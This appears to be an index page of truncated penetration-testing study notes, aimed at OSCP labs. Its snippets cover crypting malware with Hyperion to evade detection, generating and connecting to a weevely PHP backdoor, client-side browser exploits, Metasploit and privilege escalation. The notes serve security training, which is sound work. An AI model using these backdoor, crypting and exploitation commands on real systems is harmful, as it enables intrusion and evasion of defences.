Latest notes for PenTesting- MrLeet

MrLeet provides materials allowing anyone to gain practical hands-on experience with digital security, computer applications and network administration tasks.

There are many pages on the web documenting quick reverse shell one liners.
Pentestmonkey and Bernardo Damele have both created a good few posts between
them but I wanted to recapture what they’ve got for my notes purposes.
(It’s easier for me to find stuff if it’s in one place).
All credit goes to both of those guys where I got all t...

Score: 0

By: unknowndevice64 2019-05-18 12:26:48

Penetration Testing: What You Should Know
About Kali Linux
About Penetration Testing
The Domain
Offensive Security Labs

Getting Comfortable with Kali Linux
Finding Your Way Around Kali
Managing Kali Linux Services
The Bash Environment
Intro to Bash Scripting

The EssentiaTools

Score: 0

Crypting Known Malware with Software Protectors

One such open source crypter, called Hyperion

cp /usr/share/windows-binaries/
cd Hyperion-1.0/
i686-w64-mingw32-g++ Src/Crypter/*.cpp -o hyperion.exe
cp -p /usr/lib/gcc/i686-w64-mingw32/5.3...

Score: 0

See Metasploit Unleashed Course in the Essentials

Search for exploits using Metasploit GitHub framework source code:
Translate them for use on OSCP LAB or EXAM.


MetaSploit requires Postfresql

systemctl start postgresql

To enabl...

Score: 1

Port Forwarding - accept traffic on a given IP address and port and redirect it to a different IP address and port

apt-get install rinetd

cat /etc/rinetd.conf

# bindadress bindport connectaddress connectport
w.x.y.z 53 a.b.c.d 80

SSH Local Port Forwarding: supports bi-directional communicatio...

Score: 0

AES Decryption

Convert multiple webpages into a word list

for x in 'index' 'about' 'post' 'contact' ; do \
curl http://$ip/$x.html | html2markdown | tr -s ' ' '\\n' >> webapp.txt ; \

Or convert html to word ...

Score: 0

Web Shag Web Application Vulnerability Assessment Platform

Web Shells
ls -l /usr/share/webshells/

Generate a PHP backdoor (generate) protected with the given password (s3cr3t)
weevely generate s3cr3t
weevely http://$ip/weevely.php s3cr3t


Score: 0

Client Attacks

MS12-037- Internet Explorer 8 Fixed Col Span ID
wget -O exploit.html
service apache2 start

JAVA Signed Jar client side attack
echo '' > /var/www/html/java.html
User must hit run on the popup that occurs.

Linux Client Shells

Score: 0

Metasploit Meterpreter Privilege Escalation Guide

Try the obvious - Maybe the user is SYSTEM or is already part of the Administrator group:


net user "%username%"

Try the getsystem command using meterpreter - rarely works but is worth a try.


Score: 0

Defacto Linux Privilege Escalation Guide - A much more through guide for linux enumeration:
Try the obvious - Maybe the user is root or can sudo to root:
sudo su

Here are the commands I have learned to use to perform linux enumeration and privledge escal...

Score: 0